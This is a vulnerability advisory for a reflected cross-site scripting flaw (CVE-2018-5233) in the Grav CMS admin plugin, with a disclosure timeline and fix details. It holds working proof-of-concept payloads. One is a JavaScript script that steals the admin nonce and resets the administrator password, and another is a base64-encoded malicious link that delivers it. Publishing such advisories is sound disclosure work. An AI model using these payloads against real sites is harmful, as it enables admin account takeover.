[CVE-2018-5233] Grav CMS admin plugin Reflected Cross Site Scripting (XSS) vulnerability
We found and reported some XSS vulnerabilities in Grav CMS, a markdown based content management platform.Description
Grav CMS is a flat-file CMS using Markdown files for content management (Official Website).
It has been elected « Best Open Source CMS of 2016 » by CMS critic.
The application does not always filter user input correctly, thereby allowing an attacker to inject arbitrary Web content in the response of the server (reflected Cross Site Scripting).
CVE ID: CVE-2018-5233
Access Vector: remote
Security Risk: high
Vulnerability: CWE-79
CVSS Base Score: 7.4
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Details
On lines 355 and 358 of system/src/Grav/Common/Twig/Twig.php, unfiltered user input is passed in the $error_msg variable.
$output = $this->twig->render($template, $twig_vars);
} catch (\Twig_Error_Loader $e) {
.. snip ..
throw new \RuntimeException($error_msg, 400, $e);
}
} else {
throw new \RuntimeException($error_msg, 400, $e);
}
}
As a result, generating an exception by accessing /admin/tools/someunexistingpage and manipulating the someunexistingpage part of the URL allows to inject arbitrary Web content into the server’s response.
Proof of Concept #1
Visiting the following page:
/admin/tools/a--%3E%3Cimg%20src=x%20onerror=alert(1)%3E
will cause the execution of the alert(1) JavaScript code in the context of the visitor’s browser.
Proof of Concept #2
By tricking a logged-in admin into visiting a malicious link, any unauthenticated user can elevate its privileges to site administration.
Here follows a Proof of Concept code which:
- Grabs the
admin-nonceof the logged-in admin - Prints that nonce
- Uses it to change the current admin’s password to
Password7
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
adminNonce = "";
$.get( "/admin/user/admin",
function( data ) {adminNonce = $("input[name=admin-nonce]", data).val()}).done(
function(){
alert(window.adminNonce);
$.post( "/admin/user/admin", {
"task": "save",
"admin-nonce": adminNonce,
"data[password]": "Password7"},
function(data){document.write(data)})}
);
</script>
Here is the base64 encoded version of the payload, injected in the malicious link:
http://example.site.com/admin/tools/a--%3E%3Cimg%20src=x%20onerror=document['write'](atob('PHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuMi4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ+YWRtaW5Ob25jZSA9ICIiOyQuZ2V0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCBmdW5jdGlvbiggZGF0YSApIHthZG1pbk5vbmNlID0gJCgiaW5wdXRbbmFtZT1hZG1pbi1ub25jZV0iLCBkYXRhKS52YWwoKX0pLmRvbmUoZnVuY3Rpb24oKXthbGVydCh3aW5kb3cuYWRtaW5Ob25jZSk7JC5wb3N0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCB7ICJ0YXNrIjogInNhdmUiLCAiYWRtaW4tbm9uY2UiOiBhZG1pbk5vbmNlLCJkYXRhW3Bhc3N3b3JkXSI6ICJQYXNzd29yZDcifSwgZnVuY3Rpb24oZGF0YSl7ZG9jdW1lbnQud3JpdGUoZGF0YSl9KX0pOzwvc2NyaXB0Pgo='))%3E
Now, after the attacker tricks a logged-in admin into clicking on this link, the admin’s password is changed to the attacker controlled value. Thus, the attacker can log in with Password7 and navigate inside the administration interface.
Timeline (dd/mm/yyyy)
- 01/07/2017 : Initial discovery
- 01/07/2017 : Contact with the editor (email address)
- 02/07/2017 : Editor acknowledges the report
- 02/07/2017 : Sending further details and PoC code to the editor
- 04/07/2017 : Editor fixes the vulnerability
- 15/03/2018 : Advisory publication
Fixes
Upgrade to version 1.3.0 and above (currently 1.3.10)
Affected versions
- Version 1.2.4 (last stable version as of 02/07/2017 – previous versions are probably also vulnerable but not tested)
Credits
- Kevin LOCATI k.locati@sysdream.com